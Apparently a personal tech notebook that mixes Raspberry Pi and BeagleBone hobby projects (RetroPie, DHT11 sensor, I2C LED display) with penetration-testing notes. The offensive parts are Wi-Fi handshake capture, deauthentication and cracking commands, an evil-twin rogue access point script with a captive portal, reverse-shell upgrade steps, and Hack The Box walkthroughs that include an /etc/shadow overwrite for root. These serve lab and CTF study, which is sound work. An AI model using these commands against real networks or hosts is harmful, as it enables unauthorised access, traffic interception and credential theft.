retropie

As Raspberry 4 is delivering form China, I turned legacy little gadget into retro gamebox just for fun. It could not too complex, but there were some trial errors as always.

retropie

PrE-requisite

Raspberry 3b+
SENS Game controllers
16GB+ Micro SD Card
Retropie images
Game Roms

Configuration

Most of setting can be left unchanged, but there might be some madatory changes required depending on environment.

setting:configuration->raspi-config->1.change user password
setting:configuration->raspi-config->2.network options->WiFi-setting
(need to make sure that the password for WiFi can not have a special character @)
setting:configuration->raspi-config->5.interfacing option->enable ssh

After rebooting, then install the lightdm for autologin
$sudo apt-get install lightdm
setting: configuration->raspi-config->3.boot options->4.desktop autologin

If HDMI interface is default for sound, there is no issue but when using 3.5mm analogue audio out, it requires additional configuration changes.

To get audio through the 3.5 jack: Retropie configuration > Audio > select option 2 (headphones – 3.5mm jack) > OK > restart system

Additional settings

for un-archiving Rom packages;
$apt-get install unrar-free p7zip

Downloading Roms

https://nblog.org/rompacks-romsets/
https://raspberrytips.com/download-retropie-roms/
https://github.com/RetroPie/RetroPie-Setup/wiki/First-Installation

enabling temperature sensor

Connection

Beaglebone DHT11

Connect 3 Pins of DH11 3.3V,  ground and P8_11 headers, for DHT11 sensor initialization by reference of BeagleBone Black’s cape expansion headers information

DH11 specifications

Download Python Library for DHT

Adafruit Python DHT Sensor Library

Python3
$sudo apt-get update 
$sudo apt-get install python3-pip 
$sudo python3 -m pip install --upgrade pip setuptools wheel

Setup Library
$sudo pip3 install Adafruit_DHT

Examine CODES

$sudo python3 ./AdafruitDHT.py 11 P8_11
Temp=21.0* Humidity=39.0%

#!/usr/bin/python
import sys
import Adafruit_DHT

sensor=11
pin="P8_11"

while True:
    humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)
    print('Temp={0:0.1f}*  Humidity={1:0.1f}%'.format(temperature, humidity))

Displaying on LED 7 Segments

Cracking Wi-fi Password (classic)

Procedure

Scanning->Capturing/De-authorization handshake packet->Cracking

Scanning

#airmon-ng check kill
#airmon-ng start wlan0mon
#airodump-ng wlan0mon

Capturing/De-authorization

#airodump-ng –bssid MACADDRESS -c Channel –write DUMPFILE wlanmon0
#aireplay-ng –deauth 100 -a MACADDRESS wlanmon0 (for deauthorization if required)

Cracking/Brute-forcing

#aircrack-ng DUMPFILE -w WORDLIST

build rogue AP

https://dalewifisec.wordpress.com/2013/05/16/evil-twin-access-point-attack-explained/

dnsmasq.conf

interface=wlan0mon
address=/#/10.10.12.1
dhcp-range=10.10.12.2,10.10.12.254,255.255.255.0,1h
dhcp-option=3,10.10.12.1
dhcp-option=6,10.10.12.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Procedure.sh

sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo rghostapd -i "wlan0mon" --ssid "secured" -c 6 -pK "SecretPassword"
sudo ifconfig wlan0mon up 10.10.12.1 netmask 255.255.255.0
sudo route add -net 10.10.12.0 netmask 255.255.255.0 gw 10.10.12.1
sudo killall dnsmasq
sudo dnsmasq -C /root/ghostap/dnsmasq.conf -d


sudo sysctl net.ipv4.ip_forward=1
sudo iptables-legacy --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
sudo iptables-legacy --append FORWARD --in-interface wlan0mon -j ACCEPT
#config : /etc/nginx/sites-enabled/captive_portal
sudo service nginx start

small tips (workaround)

When failing apt-get update or upgrade

$sudo apt-get install ntpdate
$sudo ntpdate -v pool.ntp.org 

Enabling Promiscuous mode

 sudo ifconfig eth0 promisc

auto starting ssh service

systemctl enable ssh.service

VM fusion full resolution for linux(kali)

apt-get install open-vm-tools-desktop fuse

https://www.kali.org/docs/virtualization/install-vmware-tools-kali-guest/

Proxy switcher

https://null-byte.wonderhowto.com/how-to/use-burp-foxyproxy-easily-switch-between-proxy-settings-0196630/

“inconsistent use of tabs and spaces in indentation” in Python

$autopep8 -i my_file.py

vmmon not found

vmware-modconfig --console --install-all
ref:https://kb.vmware.com/s/article/1002411

Set timezone
$sudo timedatectl set-timezone list
$sudo timedatectl set-timezone America/Edmonton

dumb to interactive shell

When spawning new web shell, it is commonly just nothing but the dumb terminal. To explorer target system better, it is mandatory to use fully interactive shell. There are few ways to make it, but I believe those two options were the best.

Python pty module

target$python -c 'import pty; pty.spawn("/bin/bash")'  
target$ctrl+z
host$stty raw -echo
host$fg
target$enter * 2

more accurate

target$python -c 'import pty;pty.spawn("/bin/bash")'
target$ctrl+z
host$echo $TERM // write down 
host$stty -a // write down rows, columns numbers
host$stty raw -echo
host$fg
target$reset
target$export TERM='something' //same as host
target$stty rows 'number' columns 'number' //same as host

other options

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

[HTB] optimum

Attacking Vector

http->code injection->web reverse shell(powershell) -> priv esc

Decision Tree

1)discovery : which ports are opened?
– only 80 port is opened

2)enumerate : input/output sanitization? third platform?
– check the website, does it use open source platform? any known vulnerabilities?
– inject malicious strings, %00, {, |, . are acceptable?
– can execute remote script?

3)manipulate webpage : any possible exploits?
– exploit db, python code compile -> cmd shell (okay)
– but, better way?

4)get a reverse shell : can we get a reverse web shell?
– manipulate HTTP request by using burp
– pawn a powershell

5)privilege escalation : any mis-configurations or vulnerabilities?
– upload/execute powershell script

Tools & References

tools: Empire, nishang, Sherlock
https://www.exploit-db.com/exploits/39161

[HTB] teacher

Attacking Vector

http->code injection->web reverse shell -> priv esc

Decision Tree

1)discovery : which ports are opened?
– only 80 port is opened

2)enumerate : third party web platform?
– use gobuster to check directory structure
– check the website, does it use open source platform? any known vulnerabilities?
– are those files really images? or have weird sizes compared to other one?
– find username and password by enumerating webpage, image files
– ask google for a help, research blog

3)manipulate webpage : any possible exploits?
– inject php code

4)get a reverse shell : can we get a reverse web shell?
– manipulate HTTP request by using burp
– php cmd shell

5)privilege escalation : any mis-configurations or vulnerabilities?
– pspy to check system process
– focus on cronjob which as privileged permission

6)manipulate file
– replace file to /etc/shadow in cronjob
– copy normal users hashed password to root in /etc/shadow

https://blog.ripstech.com/2018/moodle-remote-code-execution/

Tools & References

tools: gobuster, wfuzz, pspy
https://blog.ripstech.com/2018/moodle-remote-code-execution/
https://www.exploit-db.com/exploits/46551

I2C Interaction / BBB

Physical connections

GPIO 1: GND —–> 2
GPIO3 :3.3V ——> 4
GPIO19: P9_20 : SCL ——> 18
GPIO20: P9_19: SDA ——> 17

Check Configuration

//To check slave address and bus number
$i2cdetect -r 2
$i2cset 2 0x70 0x70 2
$i2cdump 2 0x70

//To initialise i2c device
$i2cset -y 2 0x70 0x21 // Setup
$i2cset -y 2 0x70 0x81
$i2cset -y 2 0x70 0xe0

Additional Software installation

$sudo apt-get install pip python-dev python-smbus python-imaging git
$sudo pip install Adafruit-LED-Backpack

$git clone https://github.com/adafruit/Adafruit_Python_LED_Backpack.git 
$cd Adafruit_Python_LED_Backpack
$sudo python setup.py install

Compile code

Regardless of program language there are device’ slave address and bus number are pre-defined. It is required to change those values to be synchronized with local environment.

##sevensegment_test.py
//display = SevenSegment.SevenSement() 
display =SevenSegment.SevenSegment(address=0x70, busnum=2)

##example.c
//int i2c_bus = 1
int i2c_bus = 2

Reference

https://andicelabs.com/2013/07/adafruit7segment/
https://cdn-learn.adafruit.com/downloads/pdf/led-backpack-displays-on-raspberry-pi-and-beaglebone-black.pdf
https://emalliab.wordpress.com/2013/07/20/adafruit-8x8-backpack-ht16k33-rpi/